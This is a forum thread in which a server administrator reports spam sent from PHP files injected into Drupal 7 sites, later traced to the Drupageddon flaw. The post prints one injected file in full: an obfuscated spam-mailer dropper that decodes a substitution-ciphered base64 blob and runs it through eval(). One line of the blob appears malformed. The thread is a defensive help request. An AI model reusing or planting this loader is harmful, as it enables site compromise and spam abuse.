php file injection in webfolders

Hi!

I'm not sure if the following problem is directly related to ISPConfig, but maybe someone here knows:

Last night, 2 of our webservers started sending a lot of spam, originating from php-files which were apparently injected into the web folder of several clients.

I was able to stop the problem by just deleting the offending files, but I am quite worried how this could happen.

All the sites were Drupal 7 Sites. One webserver runs apache2, the other one nginx. ISPconfig 3.0.5.3 is running on both servers.

The php-files were located in seemingly random folders in the drupal installation. For example in /web/sites/all/modules/contrib/panels/plugins/page_wizards/alias.php.

The php maillog states the following:

Code:

[22-Oct-2014 07:30:51 UTC] mail() on [/var/www/clients/client11/web22/web/sites/all/modules/contrib/panels/plugins/page_wizards/alias.php(235) : 
eval()'d code:173]: To: [email protected] -- Headers: From: "FedEx Standard Overnight" 
<[email protected]> X-Mailer: EircomNetCRCWebmail(http://www.eircom.net/) 
Reply-To: "FedEx Standard Overnight" <[email protected]> Mime-Version: 1.0 Content-Type: multipart/alternative;boundary=
"----------141396305154475D2B66A00"

Does anyone have some pointers how this could have happened, or what can be done to prevent such behaviour.

 

Here is the content of one of the injected php-files which were sending the spam:

Code:

<?php
$vNOQ1WP = Array('1'=>'j', '0'=>'Z', '3'=>'e', '2'=>'4', '5'=>'H', '4'=>'I', '7'=>'1', '6'=>'A', '9'=>'F', '8'=>'U', 'A'=>'t', 'C'=>'V', 'B'=>'W', 'E'=>'P', 'D'=>'8', 'G'=>'h', 'F'=>'0', 'I'=>'D', 'H'=>'u', 'K'=>'3', 'J'=>'5', 'M'=>'l', 'L'=>'R', 'O'=>'f', 'N'=>'n', 'Q'=>'M', 'P'=>'k', 'S'=>'y', 'R'=>'a', 'U'=>'2', 'T'=>'c', 'W'=>'Q', 'V'=>'p', 'Y'=>'z', 'X'=>'N', 'Z'=>'i', 'a'=>'K', 'c'=>'x', 'b'=>'o', 'e'=>'C', 'd'=>'w', 'g'=>'q', 'f'=>'s', 'i'=>'E', 'h'=>'Y', 'k'=>'L', 'j'=>'r', 'm'=>'7', 'l'=>'B', 'o'=>'G', 'n'=>'6', 'q'=>'v', 'p'=>'d', 's'=>'9', 'r'=>'m', 'u'=>'g', 't'=>'X', 'w'=>'b', 'v'=>'T', 'y'=>'O', 'x'=>'S', 'z'=>'J');
function v3NUZSL($v0NE16N, $v7WRNK7){$vP4KBXC = ''; for($i=0; $i < strlen($v0NE16N); $i++){$vP4KBXC .= isset($v7WRNK7[$v0NE16N[$i]]) ? $v7WRNK7[$v0NE16N[$i]] : $v0NE16N[$i];}
return base64_decode($vP4KBXC);}
$vYDCSXA = 'erMraoMYTUCFaeLO8isvC9fZhUsP0xzpax6rzZlVTKXMpeuPt7lE87Lw4rX7TKLqwCs'.
'GhKLVwU2ZtxPuzZhuRtXO0Usq09sVTeuPt7X98M098MfN8PCXv7L9tF9i'.
'L94NtxPVeNfaeBCUhBdbhr9Y0vhFtULMhUsP0xuPt7lE87Lw4rXq'.
'0o8ZtxPVydbz0tGVpeuVydVseuVV0Z6bRtXY0tWbz9sWv7X8BSzF3tlM4MFV4ehr4eLO8isvC9fZp5Md0xzpEvF'.
'ZQx4VeNfaetLJTo8ctKXMwrWbavfaeBC2RtWbavfaOWVMw5XMRBhuaoMYTUCFaeLO8isvC9fZp5Md0xzpax6rzZ'.
'6Pt7lE87Lw4NLJTo8ZtvFs414ZaWVmeuVserCfTUCV0Z6bRtXY0tWbz9s'.
'Wv7X8BSzF3tlM4MFVaWVmeuMMhUGq4eLO8isvC9fZp5Md0xzpydbz0tGVpeu'.
'VydVseuVMTNzqTMDFQIWbavfaer07wrXFRBsH4oMYtUpqwULORt6bzoMdaWVmeuPP0Usq05QuExllTNzG3xuZXZ'.
'2cyI8HQ1QJkZ4f4e42k1iYye2cQvuH4ZPmeuPaeB0qTrCGhUuuaeLNw'.
'UsPTSlGTS6P0Usq0ePaetfaeWMV0Z6bTKLSTKLSaeLVTeduzopqwUWV4eis4i0lv9X9aWbzetfaeWPzTrCFptzH49LxC'.
'88meuPzOWbzOWbzeuMS0tL7Tr2uLP9Q8F8meNFaer07wrXFRBsH45LJTo8ctKXMwrWbaWVmeuMV0ZuGRtXY0tWbz9sWv7X8'.
'BSzMwB9Vw5QZtxPaeWPzv74u4BMYTUCFaeLO8isvC9fZpoGMwBCY4MFVeuPze8sx4e9VTKXMpeuPt7lE87Lw4r7'.
'MTKXG0UCY4MFVeuPze8sx4e9VTKXMpeuPt7lE87Lw4r0SwU7Y4MFVeuPze8sx4e9VTKXMpeu'.
'Pt7lE87Lw4r7GRBcMTNQZtxPaexPaetfaeWMM3oMFaePmeuMseubzRBhb0UCFtU7G0UM1tK9'.
'7wKLMT7sNToQbaxPaetfaeWMrwKzMhBXbaeLO8isvCelGTS6PRUCJ4IF+4eLdwKXFaWbzetfaeWPzz9sWv7X8BSLj0tMp4IFuT'.
'KLSRtl1TUcGTUGMTSuPTosYpePmeuPzOWbzOWbaexLMwB9Vw5QuExl6pBJY0tzVhBcV3r8bhr9Y0vhF'.
'tULMhUsP0xuPt7lE87Lw4rCAhBMfTSzpaxPmeuPPpoGMwBCY4IFuW5CH'.
'TUCSRB9fRtVMaozGTU8UX9sP0BXq0o8bz9sWv7X8BSzFRoCA0tQZtxPVydbzzo7MTKXG0UCY4IFu'.
'W5CHTUCSRB9fRtVMaozGTU8UX9sP0BXq0o8bz9sWv7X8BSzA0tXYhBpMTSzpaxPmeuPP0NzqwtQuExl6'.
'pBJY0tzVhBcV3r8bhr9Y0vhFtULMhUsP0xuPt7lE87Lw4r0SwU7Y4MFVavfaexLAhBMf0t'.
'zY4IFuW5CHTUCSRB9fRtVMaozGTU8UX9sP0BXq0o8bz9sWv7X8BSzA'.
'hBMf0tzY4MFVavfaexLGwoMGTUCY4IFuW5CHTUCSRB9fRtVMaozGTU8UX9sP'.
'0BXq0o8bz9sWv7X8BSzGwoMGTUCY4MFVavfaexLdhtXY0tQuExl6pBJY0tzVhBcV3r8bhr9Y0vhFtULMhUsP0xuP'.
't7lE87Lw4NlGTKXMTSzpaxPmeubzRBhbRtXY0tWbz9svLCzBLC4VaWbz3dbzexLO8FCxCPCxBSpWx9lO8FCQL'.
'Zpp4IFu4ZDZyS6aeWPPt7X98M098MfN8PCXv7L9tF9iL94Ntx6s4e4cQ1THQe2dk1iZydbzeBMrae9MwtlF3'.
'xuPt7X98M098MfNx9L889shtF0E8Mpl8PL9L9sov74NtxPVeuPz3dbzeWPPt7X98M098MfNx9L889shtF0E8Mpl8'.
'PL9L9sov74Ntx6s4e4cQ1THQe2dk1iZydbzetFaetFaeuMV0ZGVTKXMpeuPtF0'.
'zviCvaxPaetfaeWMrwKzMhBXbaeLOLPMQLCQuhtQuzoAM3x6sEZ6P0rMf0xPaeWMme'.
'uPzexLrRBcMwr9A0x6s4o9fpoCStU7GhKzqTSuPhBcVhtXMT7fPRUCJtxPmeuPzexLrRBcMwr9A0x6s4oJ7'.
'wCsAhBXSwKQbzo0VwoCHhB7MavfaeWPzzo0VwoCHhB7M4IFupoC2p9sAhBXSwKQb'.
'zo0VwoCHhB7MavfaeWPzzo0VwoCHhB7M4IFu3oJ7wCsAhBXSwKQbzo0VwoCHhB7MavfaeWPzz9sox8c987fPRUC'.
'JtCfZwr9A0xzp4IFuzo0VwoCHhB7MydbzetFaetFaeuMV0ZGMwtlF3xuP0B7GRBcYaxPaetfaeWMM3o'.
'MFaePmeuMseubz0rsS0B91Re6bzoCAhBMfTSlGTS6P0NLMRBduEv2uzoCAhBMfaWbz3dbzexLFRoCA0x6s4eL'.
'FRoCA0tXwhtzShtMOTr9H0euPpoGMwBCYaCFmeuPzz5Lb0B7M4IFuhBcF0tzOwB91TrsYaeLFRoCA'.
'0CfZpoGMwB8ZtxPmeuPzz5Lb0B7M4IFuwNCAtU7GhKzqTSuPpoGMwB8VydbzexLFRoCA0x'.
'6s45LM35LOwB91TrsYaeLFRoCA0xPmeuPzz5Lb0B7M4IFu3oJ7wCsAhBXSwKQbz5Lb0B7MavfaeuPzzo7MTKXG0U'.
'8uEx6PwBCYTU9N0tXwhtzShtMOTr9H0euPwBCYTU9N0tQVtvfaeWPPwBCYTU9N0x6s4o9fpoCStU7GhKzqTSuPwBCYTU9N0'.
'CfZwBCYTU9N0xzpavfaeWPPwBCYTU9N0x6s4oJ7wCsAhBXSwKQbzo7MTKXG0U8Vyd'.
'bzexLA0tXYhBpM4IFupoC2p9sAhBXSwKQbzo7MTKXG0U8VydbzexLA0tXYhBpM4IFu3oJ7wCsAhBXSwKQbzo7MTKXG0U8Vydbz'.
HhSuPTo9ShB7Yavfa4e6u4e6u4e6u4e6u4e6u4e6'.
'u4elseZ6u4e6u4e6u4e6u4e6u4elseZ6u4e6u4e6u4e6u4e6u4el'.
'V0Zuuz5lGTr9AT7fNTrCFptzHz7FsExpb0B9P0tzYzS6V45zMp5CSwZ6PRoCG0oCST'.
'Yfa4e6u4e6u4e6u4e6uOWbu4e6u4e6u45Fa4e6u4e6u4e6a4e6u4e6u4'.
'el60rXfwKXMaeLrTePmeZ6u4elseZ6u4elMw5XM45zMp5CSwZloW8cvLvfqa'.
'Z6P0tzSTKLSkZLMTNzHwYfuaZDa4e6u46bu4e6uRBhb4eLdhtzGwtXwzKzMp5CSwZppEvFNh'.
'tzShtPN4ePuz5zMTS6s4o9STr9Jaepb0B9P0tzYzYF+zoGMhBLMTNQf4ep1wUJF0BJFzYF+z5zMTSPmeZ6u4e6a4e6u'.
'45zMp5CSwZ6PTrCYydVs';
eval(v3NUZSL($vYDCSXA, $vNOQ1WP));?>

 

Hi Till,

you were exactly right. It was because of the recent drupageddon hack. Some of our sites were affected by it. The files were placed in the filesystem via drupals menu_router system using a file_put_contents callback. So it really isn't a server/ISPConfig specific security problem, but purely a Drupal problem.